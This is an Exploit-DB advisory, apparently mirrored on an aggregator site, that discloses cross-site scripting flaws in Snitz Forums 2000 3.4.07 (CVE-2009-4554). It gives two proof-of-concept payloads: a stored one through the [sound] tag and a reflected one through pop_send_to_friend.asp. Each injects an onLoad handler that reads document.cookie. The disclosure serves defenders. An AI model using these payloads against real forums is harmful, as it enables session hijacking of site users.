Lucene search
Andrea FabriziEDB-ID:9856HistoryOct 15, 2009 - 12:00 a.m.
Snitz Forums 2000 - Multiple Cross-Site Scripting Vulnerabilities
2009-10-1500:00:00
Andrea Fabrizi
www.exploit-db.com
29
AI Score
7.4
Confidence
Low
**************************************************************
Application: Snitz Forums 2000
Version affected: 3.4.07
Website: http://forum.snitz.com/
Discovered By: Andrea Fabrizi
Email: andrea.fabrizi () gmail com
Web: http://www.andreafabrizi.it
Vuln: Multiple Cross-Site Scripting
**************************************************************
###### PERMANENT XSS
If [sound] tag is allowed:
[sound]http://url_to_valid_mp3_or_m3u_file.m3u";
onLoad="alert(document.cookie)[/sound]
######
###### LINK XSS
http://localhost/forum/pop_send_to_friend.asp?url=</textarea><img
src="http://www.google.it/intl/it_it/images/logo.gif"; onLoad
="alert(document.cookie)">
Note the space: onLoad<space>="alert(document.cookie)"
######Related
nvd
nvd
CVE-2009-4554
2010-01-04 21:30:00
prion
prion
Cross site scripting
2010-01-04 21:30:00
cvelist
cvelist
CVE-2009-4554
2010-01-04 21:00:00
openvas
openvas
Snitz Forums 2000 Cross Site Scripting and HTML Injection Vulnerabilities
2009-10-20 00:00:00
Snitz Forums 2000 Cross Site Scripting and HTML Injection Vulnerabilities
2009-10-20 00:00:00
cve
cve
CVE-2009-4554
2010-01-04 21:30:00
exploitdb
exploitdb